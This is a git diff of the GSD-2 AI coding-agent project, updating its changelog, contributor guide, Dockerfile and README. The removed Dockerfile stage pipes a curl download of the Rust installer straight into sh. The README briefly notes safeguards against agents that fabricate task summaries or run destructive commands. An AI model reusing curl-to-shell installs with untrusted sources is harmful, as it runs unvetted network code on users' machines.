errors from parser migration +- **gsd**: wrap plan-task DB writes in transaction + untrack .gsd/ artifacts +- **S04/T04**: Add planning-crossval tests proving DB↔rendered↔parsed pa… +- **S04/T01**: Add schema v9 migration with sequence column on slices/ta… +- remove .gsd/ milestone artifacts from git index +- **tests**: update remediation step assertions and crossval fixture +- 
**gsd**: address all 7 review findings from PR #2141 +- **tests**: remove invalid `seq` property from insertMilestone calls + +### Changed +- **contrib**: add CODEOWNERS and team workflow docs (#2286) +- **M001**: auto-commit after complete-milestone +- **M001**: auto-commit after validate-milestone +- **M001/S06**: auto-commit after complete-slice +- **M001/S06**: auto-commit after plan-slice +- **M001/S06**: auto-commit after research-slice +- **M001/S05**: auto-commit after complete-slice +- **M001/S05**: auto-commit after plan-slice +- **M001/S05**: auto-commit after research-slice +- **M001/S04**: auto-commit after complete-slice +- **M001/S04**: auto-commit after research-slice +- **M001/S03**: auto-commit after complete-slice +- **M001/S03**: auto-commit after plan-slice +- **M001/S03**: auto-commit after research-slice +- **M001/S02**: auto-commit after complete-slice +- **M001/S02**: auto-commit after plan-slice +- **M001/S02**: auto-commit after research-slice +- **M001/S01**: auto-commit after complete-slice + +## [2.43.0] - 2026-03-23 + +### Added +- **forensics**: opt-in duplicate detection before issue creation (#2105) + +### Fixed +- prevent banner from printing twice on first run (#2251) +- **test**: Windows CI — use double quotes in git commit message (#2252) +- **async-jobs**: suppress duplicate follow-up for awaited job results (#2248) (#2250) +- **gsd**: remove force-staging of .gsd/milestones/ through symlinks (#2247) (#2249) +- **gsd**: remove over-broad skill activation heuristic (#2239) (#2244) +- **auth**: fall through to env/fallback when OAuth credential has no registered provider (#2097) +- **lsp**: bound message buffer and clean up stale client state (#2171) +- clean up macOS numbered .gsd collision variants (#2205) (#2210) +- **search**: keep duplicate-search loop guard armed (#2117) +- clean up extension error listener on session dispose (#2165) +- **web**: resolve 4 pre-existing onboarding contract test failures (#2209) +- async bash 
job timeout hangs indefinitely instead of erroring out (#2214) +- **gsd**: apply fast service tier outside auto-mode (#2126) +- **interactive**: clean up leaked SIGINT and extension selector listeners (#2172) +- **ci**: standardize GitHub Actions and Node.js versions (#2169) +- **native**: resolve memory leaks in glob, ttsr, and image overflow (#2170) +- extension resource management — prune stale dirs, fix isBuiltIn, gate skills on Skill tool, suppress search warnings (#2235) +- batch isolated fixes — error messages, preferences, web auth, MCP vars, detection, gitignore (#2232) +- document iTerm2 Ctrl+Alt+G keybinding conflict and add helpful hint (#2231) +- **footer**: display active inference model during execution (#1982) +- **web**: kill stale server process before launch to prevent EADDRINUSE (#1934) (#2034) +- **git**: force LC_ALL=C in GIT_NO_PROMPT_ENV to support non-English locales (#2035) +- **forensics**: force gh CLI for issue creation to prevent misrouting (#2067) (#2094) +- force-stage .gsd/milestones/ artifacts when .gsd is a symlink (#2104) (#2112) +- **pi-ai**: correct Copilot context window and output token limits (#2118) + +### Changed +- startup optimizations — pre-compiled extensions, compile cache, batch discovery (#2125) + +## [2.42.0] - 2026-03-22 + +### Added +- **gsd**: declarative workflow engine — YAML-defined workflows through the auto-loop (#2024) +- **gsd**: unified rule registry, event journal, journal query tool, and tool naming convention (#1928) +- **ci**: PR risk checker — classify changed files by system and surface risk level (#1930) +- ADR attribution — distinguish human vs agent vs collaborative decisions (#1830) +- add /gsd fast command and gate service tier icon to supported models (#1848) (#1862) +- add --host, --port, --allowed-origins flags for web mode (#1847) (#1873) + +### Fixed +- **tests**: wrap rmSync cleanup in try/catch for Windows EPERM +- **tests**: add maxRetries to rmSync cleanup for Windows EPERM 
compatibility +- recursive key sorting in tool-call loop guard hash function (#1962) +- use path.sep for cross-platform path traversal guards and test assertions +- **tests**: use cross-platform path split in run-manager timestamp test +- prevent SIGTSTP crash on Windows (#2018) +- add missing codeFilesChanged to journal integration test mock +- **repo-identity**: use native realpath on Windows to resolve 8.3 short paths (#1960) +- **doctor**: gate roadmap checkbox on summary existing on disk, not issue detection (#1915) +- warn when milestone merge contains only metadata and no code (#1906) (#1927) +- **worktree**: resolve 8.3 short paths and use shell mode for .bat hooks on Windows (#1956) +- **web**: persist auth token in sessionStorage to survive page refreshes (#1877) +- clean up SQUASH_MSG after squash-merge and guard worktree teardown against uncommitted changes (#1868) +- populate RecoveryContext in hook unit supervision to prevent crash on stalled tool recovery (#1867) +- resolve worktree path from git registry when .gsd/ symlink is shadowed (#1866) +- resolve Node v24 web boot failure — ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING (#1864) +- **auto**: broaden worktree health check to all ecosystems (#1860) +- **doctor**: cascade slice uncheck when task_done_missing_summary unchecks tasks (#1850) (#1858) +- defend exit path against ESM module cache mismatch (#1854) +- escape parentheses in paths before bash shell-out, fix __extensionDir fallback (#1872) +- use PowerShell Start-Process for Windows browser launch, prevent URL wrapping (#1870) +- clear stale unit state and restore CWD when step-wizard exits auto-loop (#1869) +- prevent cross-project state leak in brand-new directories (#1639) (#1861) +- reconcile worktree HEAD with milestone branch ref before squash merge (#1846) (#1859) +- normalize Windows backslash paths in bash command strings (#1436) (#1863) +- parsePlan and verifyExpectedArtifact recognize heading-style task entries (#1691) (#1857) +- 
sync all milestone dirs regardless of naming convention (#1547) (#1845) + ## [2.41.0] - 2026-03-21 ### Added @@ -1598,7 +2601,36 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/). ### Changed - License updated to MIT -[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...HEAD +[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.67.0...HEAD +[2.67.0]: https://github.com/gsd-build/gsd-2/compare/v2.66.1...v2.67.0 +[2.66.1]: https://github.com/gsd-build/gsd-2/compare/v2.66.0...v2.66.1 +[2.66.0]: https://github.com/gsd-build/gsd-2/compare/v2.65.0...v2.66.0 +[2.65.0]: https://github.com/gsd-build/gsd-2/compare/v2.64.0...v2.65.0 +[2.64.0]: https://github.com/gsd-build/gsd-2/compare/v2.63.0...v2.64.0 +[2.63.0]: https://github.com/gsd-build/gsd-2/compare/v2.62.1...v2.63.0 +[2.62.1]: https://github.com/gsd-build/gsd-2/compare/v2.62.0...v2.62.1 +[2.62.0]: https://github.com/gsd-build/gsd-2/compare/v2.61.0...v2.62.0 +[2.61.0]: https://github.com/gsd-build/gsd-2/compare/v2.60.0...v2.61.0 +[2.60.0]: https://github.com/gsd-build/gsd-2/compare/v2.59.0...v2.60.0 +[2.59.0]: https://github.com/gsd-build/gsd-2/compare/v2.58.0...v2.59.0 +[2.58.0]: https://github.com/gsd-build/gsd-2/compare/v2.57.0...v2.58.0 +[2.57.0]: https://github.com/gsd-build/gsd-2/compare/v2.56.0...v2.57.0 +[2.56.0]: https://github.com/gsd-build/gsd-2/compare/v2.55.0...v2.56.0 +[2.55.0]: https://github.com/gsd-build/gsd-2/compare/v2.54.0...v2.55.0 +[2.54.0]: https://github.com/gsd-build/gsd-2/compare/v2.53.0...v2.54.0 +[2.53.0]: https://github.com/gsd-build/gsd-2/compare/v2.52.0...v2.53.0 +[2.52.0]: https://github.com/gsd-build/gsd-2/compare/v2.51.0...v2.52.0 +[2.51.0]: https://github.com/gsd-build/gsd-2/compare/v2.50.0...v2.51.0 +[2.50.0]: https://github.com/gsd-build/gsd-2/compare/v2.49.0...v2.50.0 +[2.49.0]: https://github.com/gsd-build/gsd-2/compare/v2.48.0...v2.49.0 +[2.48.0]: https://github.com/gsd-build/gsd-2/compare/v2.47.0...v2.48.0 +[2.47.0]: 
https://github.com/gsd-build/gsd-2/compare/v2.46.1...v2.47.0 +[2.46.1]: https://github.com/gsd-build/gsd-2/compare/v2.46.0...v2.46.1 +[2.46.0]: https://github.com/gsd-build/gsd-2/compare/v2.45.0...v2.46.0 +[2.45.0]: https://github.com/gsd-build/gsd-2/compare/v2.44.0...v2.45.0 +[2.44.0]: https://github.com/gsd-build/gsd-2/compare/v2.43.0...v2.44.0 +[2.43.0]: https://github.com/gsd-build/gsd-2/compare/v2.42.0...v2.43.0 +[2.42.0]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...v2.42.0 [2.41.0]: https://github.com/gsd-build/gsd-2/compare/v2.40.0...v2.41.0 [2.40.0]: https://github.com/gsd-build/gsd-2/compare/v2.39.0...v2.40.0 [2.39.0]: https://github.com/gsd-build/gsd-2/compare/v2.38.0...v2.39.0 diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index acf637fc2..335cf7842 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -11,6 +11,59 @@ Read [VISION.md](VISION.md) before contributing. It defines what GSD-2 is, what 3. **No issue? Create one first** for new features. Bug fixes for obvious problems can skip this step. 4. **Architectural changes require an RFC.** If your change touches core systems (auto-mode, agent-core, orchestration), open an issue describing your approach and get approval before writing code. We use Architecture Decision Records (ADRs) for significant decisions. +## Branching and commits + +Always work on a dedicated branch. Never push directly to `main`. + +**Branch naming:** `<type>/<short-description>` + +| Type | When to use | +|------|-------------| +| `feat/` | New functionality | +| `fix/` | Bug or defect correction | +| `refactor/` | Code restructuring, no behavior change | +| `test/` | Adding or updating tests | +| `docs/` | Documentation only | +| `chore/` | Dependencies, tooling, housekeeping | +| `ci/` | CI/CD configuration | + +**Commit messages** must follow [Conventional Commits](https://www.conventionalcommits.org/). The commit-msg hook enforces this locally; CI enforces it on push. 
+ +``` +<type>(<scope>): <description> +``` + +Valid types: `feat` `fix` `docs` `chore` `refactor` `test` `infra` `ci` `perf` `build` `revert` + +``` +feat(pi-agent-core): add streaming output for long-running tasks +fix(pi-ai): resolve null pointer on empty provider response +chore(deps): bump typescript from 5.3.0 to 5.4.2 +``` + +Keep branches current by rebasing onto `main` — do not merge `main` into your feature branch: + +```bash +git fetch origin +git rebase origin/main +``` + +## Working with GSD (team workflow) + +GSD uses worktree-based isolation for multi-developer work. If you're contributing with GSD running, enable team mode in your project preferences: + +```yaml +# .gsd/PREFERENCES.md +--- +version: 1 +mode: team +--- +``` + +This enables unique milestone IDs, branch pushing, and pre-merge checks — preventing milestone ID collisions when multiple contributors run auto-mode simultaneously. Each developer gets their own isolated worktree; squash merges to `main` happen independently. + +For full details see [docs/working-in-teams.md](docs/working-in-teams.md) and [docs/git-strategy.md](docs/git-strategy.md). + ## Opening a pull request ### PR description format @@ -65,10 +118,12 @@ If your PR changes any public API, CLI behavior, config format, or file structur AI-generated PRs are first-class citizens here. We welcome them. We just ask for transparency: -- **Disclose it.** Note that the PR is AI-assisted in your description. +- **Disclose it.** Note that the PR is AI-assisted in your description. Do not credit the AI tool as an author or co-author in the commit or PR. - **Test it.** AI-generated code must be tested to the same standard as human-written code. "The AI said it works" is not a test plan. - **Understand it.** You should be able to explain what the code does and why. If a reviewer asks a question, "I'll ask the AI" is not an answer. 
+AI agents opening PRs must follow the same workflow as human contributors: clean working tree, new branch per task, CI passing before requesting review. Multi-phase work should start as a Draft PR and only move to Ready when complete. + AI PRs go through the same review process as any other PR. No special treatment in either direction. ## Architecture guidelines @@ -91,9 +146,14 @@ The codebase is organized into these areas. All are open to contributions: | AI/LLM layer | `packages/pi-ai` | Provider integrations, model handling | | Agent core | `packages/pi-agent-core` | Agent orchestration — RFC required for changes | | Coding agent | `packages/pi-coding-agent` | The main coding agent | +| MCP server | `packages/mcp-server` | Project state tools and MCP protocol | | GSD extension | `src/resources/extensions/gsd/` | GSD workflow — RFC required for auto-mode | -| Native bindings | `native/` | Platform-specific native code | +| Other extensions | `src/resources/extensions/` | Browser, search, voice, MCP client, etc. | +| Native engine | `native/` | Rust N-API modules (grep, git, AST, etc.) | +| VS Code extension | `vscode-extension/` | Chat participant, sidebar, RPC integration | +| Web interface | `web/` | Browser-based dashboard | | CI/Build | `.github/`, `scripts/` | Workflows, build scripts | +| Documentation | `docs/` | User guides, ADRs, SDK docs | ## Review process @@ -103,12 +163,113 @@ PRs go through automated review first, then human review. To help us review effi - Respond to review comments. If you disagree, explain why — discussion is welcome. - If your PR has been open for a while without review, ping in Discord. We're a small team and things slip. +### What reviewers verify + +Reading a diff is not the same as verifying a change. Our review standard is execution-based, not static-analysis-based. + +**What reviewers do:** + +1. **Check out the branch** — check out the PR branch locally (or in a worktree). Don't review from the diff view alone. +2. 
**Build the branch** — run `npm run build`. A diff that doesn't compile is not reviewable. +3. **Run the test suite** — run `npm test`. CI status is a signal, not a substitute for local verification. +4. **Trace root cause for bug fixes** — confirm the diff addresses the root cause described in the issue, not just the symptom. +5. **Check for a regression test** — bug fixes must include a test that would have caught the original bug. If it's absent, the fix is incomplete. + +Only after completing these steps should a reviewer make claims about correctness. + +**What "looks right" means:** + +"Looks right" is the starting point for review, not the conclusion. "The tests pass" only means the tests pass — not that the claimed bug is fixed or the feature works as described. A well-written commit message on a broken change is still a broken change. + +### What contributors must provide to unblock review + +- **Bug fixes** — include a regression test. A fix without a test is an assertion, not a proof. +- **Features** — include tests covering the primary success path and at least one failure path. +- **Behavior changes** — update or replace any existing tests that cover the changed behavior. Don't leave passing-but-wrong tests in place. + +If your PR claims to fix issue #N, reviewers will verify the fix addresses the root cause described in #N — not just that CI is green. + +## Testing standards + +This project uses Node.js built-in `node:test` as the test runner. All new tests must follow these patterns: + +### Use `node:test` and `node:assert/strict` + +```typescript +import { describe, test, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +``` + +Do not use `createTestContext()` from `test-helpers.ts` (legacy, being removed). Do not introduce Jest, Vitest, or other test frameworks. 
+ +### Use `beforeEach`/`afterEach` or `t.after()` for cleanup — never `try`/`finally` + +```typescript +// ✅ CORRECT — shared fixture with beforeEach/afterEach +describe("feature", () => { + let tmp: string; + beforeEach(() => { tmp = mkdtempSync(join(tmpdir(), "test-")); }); + afterEach(() => { rmSync(tmp, { recursive: true, force: true }); }); + + test("case", () => { /* clean test body */ }); +}); + +// ✅ CORRECT — per-test cleanup with t.after() +test("case", (t) => { + const tmp = mkdtempSync(join(tmpdir(), "test-")); + t.after(() => { rmSync(tmp, { recursive: true, force: true }); }); + // test body +}); + +// ❌ WRONG — inline try/finally +test("case", () => { + const tmp = mkdtempSync(join(tmpdir(), "test-")); + try { + // test body + } finally { + rmSync(tmp, { recursive: true, force: true }); + } +}); +``` + +**When to use which:** +- `beforeEach`/`afterEach` — when all tests in a `describe` block share the same setup/teardown pattern +- `t.after()` — when each test has unique cleanup (different fixtures, env vars, etc.) +- `try`/`finally` — only inside standalone helper functions that don't have access to the test context `t` (e.g., `withEnv()`, `capture()`) + +### Template literal fixture data + +When constructing multi-line fixture content (markdown, YAML, etc.) inside indented test blocks, use array join to avoid unintended leading whitespace: + +```typescript +// ✅ CORRECT — no indentation leakage +const content = [ + "## Slices", + "- [x] **S01: First slice**", + "- [ ] **S02: Second slice**", +].join("\n"); + +// ❌ WRONG — template literal inside describe/test adds leading spaces +const content = ` + ## Slices + - [x] **S01: First slice** +`; +// Each line now has 2 leading spaces, breaking ^## regex anchors +``` + +### Test-first for bug fixes + +Bug fixes must include a regression test that fails before the fix and passes after. Write the test first, confirm it fails, then apply the fix. See the `test-first-bugfix` skill. 
+ ## Local development ```bash # Install dependencies npm ci +# Install git hooks (secret scanning + commit message validation) +npm run secret-scan:install-hook + # Build npm run build @@ -119,6 +280,10 @@ npm test npx tsc --noEmit ``` +Run `npm run secret-scan:install-hook` once after cloning. It installs two hooks: +- **pre-commit** — blocks commits containing hardcoded secrets or credentials +- **commit-msg** — validates Conventional Commits format before the commit lands + CI must pass before your PR will be reviewed. Run these locally to save time. ## Security diff --git a/Dockerfile b/Dockerfile index 45a18d128..b69e4bc6c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,26 +1,5 @@ # ────────────────────────────────────────────── -# Stage 1: CI Builder -# Image: ghcr.io/gsd-build/gsd-ci-builder -# Used by: pipeline.yml Dev stage -# ────────────────────────────────────────────── -FROM node:24-bookworm AS builder - -# Rust toolchain (stable, minimal profile) -RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal -ENV PATH="/root/.cargo/bin:${PATH}" - -# Cross-compilation for linux-arm64 -RUN apt-get update && apt-get install -y --no-install-recommends \ - gcc-aarch64-linux-gnu \ - g++-aarch64-linux-gnu \ - && rustup target add aarch64-unknown-linux-gnu \ - && rm -rf /var/lib/apt/lists/* - -# Verify toolchain -RUN node --version && rustc --version && cargo --version - -# ────────────────────────────────────────────── -# Stage 2: Runtime +# Runtime # Image: ghcr.io/gsd-build/gsd-pi # Used by: end users via docker run # ────────────────────────────────────────────── diff --git a/README.md b/README.md index 99fd5a4fc..34ee30c1a 100644 --- a/README.md +++ b/README.md @@ -7,8 +7,9 @@ [![npm version](https://img.shields.io/npm/v/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi) [![npm 
downloads](https://img.shields.io/npm/dm/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi) [![GitHub stars](https://img.shields.io/github/stars/gsd-build/GSD-2?style=for-the-badge&logo=github&color=181717)](https://github.com/gsd-build/GSD-2) -[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/gsd) +[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.com/invite/nKXTsAcmbT) [![License](https://img.shields.io/badge/license-MIT-blue?style=for-the-badge)](LICENSE) +[![$GSD Token](https://img.shields.io/badge/$GSD-Dexscreener-1C1C1C?style=for-the-badge&logo=data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlIGN4PSIxMiIgY3k9IjEyIiByPSIxMCIgZmlsbD0iIzAwRkYwMCIvPjwvc3ZnPg==&logoColor=00FF00)](https://dexscreener.com/solana/dwudwjvan7bzkw9zwlbyv6kspdlvhwzrqy6ebk8xzxkv) The original GSD went viral as a prompt framework for Claude Code. It worked, but it was fighting the tool — injecting prompts through slash commands, hoping the LLM would follow instructions, with no actual control over context windows, sessions, or execution. @@ -18,81 +19,77 @@ One command. Walk away. Come back to a built project with clean git history.
npm install -g gsd-pi@latest
+> GSD now provisions a managed [RTK](https://github.com/rtk-ai/rtk) binary on supported macOS, Linux, and Windows installs to compress shell-command output in `bash`, `async_bash`, `bg_shell`, and verification flows. GSD forces `RTK_TELEMETRY_DISABLED=1` for all managed invocations. Set `GSD_RTK_DISABLED=1` to disable the integration. + > **📋 NOTICE: New to Node on Mac?** If you installed Node.js via Homebrew, you may be running a development release instead of LTS. **[Read this guide](./docs/node-lts-macos.md)** to pin Node 24 LTS and avoid compatibility issues. --- -## What's New in v2.41.0 +## What's New in v2.67 -### New Features +### Context Engineering -- **Browser-based web interface** — run GSD from the browser with `gsd --web`. Full project management, real-time progress, and multi-project support via server-sent events. (#1717) -- **Doctor: worktree lifecycle checks** — `/gsd doctor` now validates worktree health, detects orphaned worktrees, consolidates cleanup, and enhances `/worktree list` with lifecycle status. (#1814) -- **CI: docs-only PR detection** — PRs that only change documentation skip build and test steps, with a new prompt injection scan for security. (#1699) -- **Custom Models guide** — new documentation for adding custom providers (Ollama, vLLM, LM Studio, proxies) via `models.json`. (#1670) +- **Tiered Context Injection (M005)** — relevance-scoped context with 65%+ token reduction. Decision scope cascade derives context from slice metadata instead of blanket injection. +- **Resilient transient error recovery** — defers to Core RetryHandler and fixes cmdCtx race conditions for more reliable auto-mode sessions. -### Data Loss Prevention (Critical Fixes) +### Provider & Model Improvements -This release includes 7 fixes preventing silent data loss in auto-mode: +- **Anthropic subscription routing** — users with Anthropic subscriptions are automatically routed through Claude Code CLI provider with proper display names across all UI surfaces. 
+- **Claude Code provider hardening** — native Windows claude lookup, fallback guards, and `out of extra usage` error matching. +- **XML parameter recovery** — pi-ai recovers XML parameters trapped in JSON strings from providers. -- **Hallucination guard** — execute-task agents that complete with zero tool calls are now rejected as hallucinated. Previously, agents could produce detailed but fabricated summaries without writing any code, wasting ~$25/milestone. (#1838) -- **Merge anchor verification** — before deleting a milestone worktree/branch, GSD now verifies the code is actually on the integration branch. Prevents orphaning commits when squash-merge produces an empty diff. (#1829) -- **Dirty working tree detection** — `nativeMergeSquash` now distinguishes dirty-tree rejections from content conflicts, preventing silent commit loss when synced `.gsd/` files block the merge. (#1752) -- **Doctor cleanup safety** — the `orphaned_completed_units` check no longer auto-fixes during post-task health checks. Previously, timing races could cause the doctor to remove valid completion keys, reverting users to earlier tasks. (#1825) -- **Root file reverse-sync** — worktree teardown now syncs root-level `.gsd/` files (PROJECT.md, REQUIREMENTS.md, completed-units.json) back to the project root. Previously these were lost on milestone closeout. (#1831) -- **Empty merge guard** — milestone branches with unanchored code changes are preserved instead of deleted when squash-merge produces nothing to commit. (#1755) -- **Crash-safe task closeout** — orphaned checkboxes in PLAN.md are unchecked on retry, preventing phantom task completion. (#1759) +### Safety & Data Integrity -### Auto-Mode Stability +- **LLM safety harness** — auto-mode damage control prevents the LLM from running destructive operations or querying `gsd.db` directly via bash. 
+- **5-wave state machine hardening** — critical data integrity fixes across atomic writes, randomized tmp paths, event log reconciliation, session recovery, and consistency enforcement. 86+ regression tests added. +- **Discussion gate enforcement** — mechanical enforcement for discussion question gates with fail-closed behavior. +- **Enhanced verification** — pre-execution plan verification checks, post-execution cross-task consistency checks, blocking behavior and strict mode. -- **Terminal hang fix** — `stopAuto()` now resolves pending promises, preventing the terminal from freezing permanently after stopping auto-mode. (#1818) -- **Signal handler coverage** — SIGHUP and SIGINT now clean up lock files, not just SIGTERM. Prevents stranded locks on VS-Code crash. (#1821) -- **Needs-discussion routing** — milestones in `needs-discussion` phase now route to the smart entry UI instead of hard-stopping, breaking the infinite loop. (#1820) -- **Infrastructure error handling** — auto-mode stops immediately on ENOSPC, ENOMEM, and similar unrecoverable errors instead of retrying. (#1780) -- **Dependency-aware dispatch** — slice dispatch now uses declared `depends_on` instead of positional ordering. (#1770) -- **Queue mode depth verification** — the write gate now processes depth verification in queue mode, fixing a deadlock where CONTEXT.md writes were permanently blocked. (#1823) +### Parallel Execution & Dispatch -### Roadmap Parser Improvements +- **Slice-level parallelism** — dependency-aware parallel dispatch within a milestone, not just across milestones. +- **Parallel research slices** — research and milestone validation run in parallel. +- **Worker model override** — configure different models for parallel milestone workers. -- **Table format support** — roadmaps using markdown tables (`| S01 | Title | Risk | Status |`) are now parsed correctly. 
(#1741) -- **Prose header fallback** — when `## Slices` contains H3 headers instead of checkboxes, the prose parser is invoked as a fallback. (#1744) -- **Completion marker detection** — prose headers with `✓` or `(Complete)` markers are correctly identified as done. (#1816) -- **Zero-slice stub handling** — stub roadmaps from `/gsd queue` return `pre-planning` instead of `blocked`. (#1826) -- **Immediate roadmap fix** — roadmap checkbox and UAT stub are fixed immediately after last task instead of deferring to `complete-slice`. (#1819) +### TUI & Notifications -### State & Git Improvements +- **Persistent notification panel** — TUI overlay, widget, and web API for real-time notifications. +- **Remote questions race** — local TUI races against remote channel (Slack/Discord) instead of remote-only routing. +- **OS-specific keyboard shortcuts** — shortcut hints now adapt to macOS/Linux/Windows. +- **`/gsd show-config`** — inspect active configuration at a glance. -- **CONTEXT-DRAFT.md fallback** — `depends_on` is read from CONTEXT-DRAFT.md when CONTEXT.md doesn't exist, preventing draft milestones from being promoted past dependency constraints. (#1743) -- **Unborn branch support** — `nativeBranchExists` handles repos with zero commits, preventing dispatch deadlock on new repos. (#1815) -- **Ghost milestone detection** — empty `.gsd/milestones/` directories are skipped instead of crashing `deriveState()`. (#1817) -- **Default branch detection** — milestone merge detects `master` vs `main` instead of hardcoding. (#1669) -- **Milestone title extraction** — titles are pulled from CONTEXT.md headings when no ROADMAP exists. (#1729) +### Infrastructure -### Windows & Platform +- **Ollama native provider** — `/api/chat` provider with full option exposure, `apiKey` auth mode, and headless probe. +- **MCP OAuth** — MCP client supports OAuth auth provider for HTTP transport. 
+- **WAL-safe migration backup** — database migrations create WAL-safe backups with stronger regression tests. +- **Xcode/xcodegen detection** — project detection now supports Xcode bundles and xcodegen. +- **170+ bug fixes** — state machine resilience, worktree safety, prompt injection, session recovery, and more. -- **Windows path handling** — 8.3 short paths, `pathToFileURL` for ESM imports, and `realpathSync.native` fixes across the test suite and verification gate. (#1804) -- **DEP0190 fix** — `spawnSync` deprecation warning eliminated by passing commands to shell explicitly. (#1827) -- **Web build skip on Windows** — Next.js webpack EPERM errors on system directories are handled gracefully. +See the full [Changelog](./CHANGELOG.md) for details on every release. -### Developer Experience +
+### Previous highlights (v2.63 and earlier) -- **@ file finder fix** — typing `@` no longer freezes the TUI. The fix adds debounce, dedup, and empty-query short-circuit. (#1832) -- **Tool-call loop guard** — detects and breaks infinite tool-call loops within a single unit, preventing stack overflow. (#1801) -- **Completion deferral fix** — roadmap checkbox and UAT stub are fixed at task level, closing the fragile handoff window between last task and `complete-slice`. (#1819) +- **MCP server** — 6 read-only project state tools for external integrations, auto-wrapup guard, and question dedup +- **Ollama extension** — first-class local LLM support via Ollama, with dynamic routing enabled by default +- **Discord bot & daemon** — dedicated daemon package, Discord bot, and headless text mode with tool calls +- **Capability-aware model routing (ADR-004)** — capability scoring, `before_model_select` hook, and task metadata extraction +- **VS Code sidebar redesign** — SCM provider, checkpoints, diagnostics panel, activity feed, workflow controls, session forking +- **`/gsd parallel watch`** — native TUI overlay for real-time worker monitoring +- **Codebase map** — automatic codebase map injection for fresh agent contexts +- **`--resume` flag** — resume previous sessions from the CLI +- **Concurrent invocation guard** — prevents overlapping auto-mode runs +- **VS Code integration** — status bar, file decorations, bash terminal, session tree, conversation history, and code lens +- **Skills overhaul** — 30+ skill packs covering major frameworks, databases, and cloud platforms +- **Single-writer state engine** — disciplined state transitions with machine guards and TOCTOU hardening +- **DB-backed planning tools** — atomic SQLite tool calls for state transitions +- **Declarative workflow engine** — YAML workflows through auto-loop +- **Doctor: worktree lifecycle checks** — validates worktree health, detects orphans, consolidates cleanup -See the full [Changelog](./CHANGELOG.md) for 
all 70+ fixes in this release. - -### Previous highlights (v2.39–v2.40) - -- **GitHub sync extension** — auto-sync milestones to GitHub Issues, PRs, and Milestones -- **Skill tool resolution** — skills auto-activate in dispatched prompts -- **Health check phase 2** — real-time doctor issues in dashboard and visualizer -- **Forensics upgrade** — full-access GSD debugger with anomaly detection -- **Pipeline decomposition** — auto-loop rewritten as linear phase pipeline -- **Sliding-window stuck detection** — pattern-aware, fewer false positives -- **Data-loss recovery** — automatic detection and recovery from v2.30–v2.38 migration issues +
--- @@ -118,7 +115,9 @@ Full documentation is available in the [`docs/`](./docs/) directory: - **[Visualizer](./docs/visualizer.md)** — workflow visualizer with stats and discussion status - **[Remote Questions](./docs/remote-questions.md)** — route decisions to Slack or Discord when human input is needed - **[Dynamic Model Routing](./docs/dynamic-model-routing.md)** — complexity-based model selection and budget pressure +- **[Web Interface](./docs/web-interface.md)** — browser-based project management and real-time progress - **[Pipeline Simplification (ADR-003)](./docs/ADR-003-pipeline-simplification.md)** — merged research into planning, mechanical completion +- **[Docker Sandbox](./docker/README.md)** — run GSD auto mode in an isolated Docker container - **[Migration from v1](./docs/migration.md)** — `.planning` → `.gsd` migration --- @@ -218,7 +217,7 @@ Auto mode is a state machine driven by files on disk. It reads `.gsd/STATE.md`, 2. **Context pre-loading** — The dispatch prompt includes inlined task plans, slice plans, prior task summaries, dependency summaries, roadmap excerpts, and decisions register. The LLM starts with everything it needs instead of spending tool calls reading files. -3. **Git worktree isolation** — Each milestone runs in its own git worktree with a `milestone/` branch. All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit. +3. **Git isolation** — When `git.isolation` is set to `worktree` or `branch`, each milestone runs on its own `milestone/` branch (in a worktree or in-place). All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit. The default is `none` (work on the current branch), configurable via preferences. 4. **Crash recovery** — A lock file tracks the current unit. 
If the session dies, the next `/gsd auto` reads the surviving session file, synthesizes a recovery briefing from every tool call that made it to disk, and resumes with full context. Parallel orchestrator state is persisted to disk with PID liveness detection, so multi-worker sessions survive crashes too. In headless mode, crashes trigger automatic restart with exponential backoff (default 3 attempts). @@ -354,6 +353,8 @@ On first run, GSD launches a branded setup wizard that walks you through LLM pro | `/gsd stop` | Stop auto mode gracefully | | `/gsd steer` | Hard-steer plan documents during execution | | `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | +| `/gsd rethink` | Conversational project reorganization | +| `/gsd mcp` | MCP server status and connectivity | | `/gsd status` | Progress dashboard | | `/gsd queue` | Queue future milestones (safe during auto mode) | | `/gsd prefs` | Model selection, timeouts, budget ceiling | @@ -460,7 +461,7 @@ An auto-generated `index.html` shows all reports with progression metrics across ### Preferences -GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project). Manage with `/gsd prefs`. +GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project). Manage with `/gsd prefs`. 
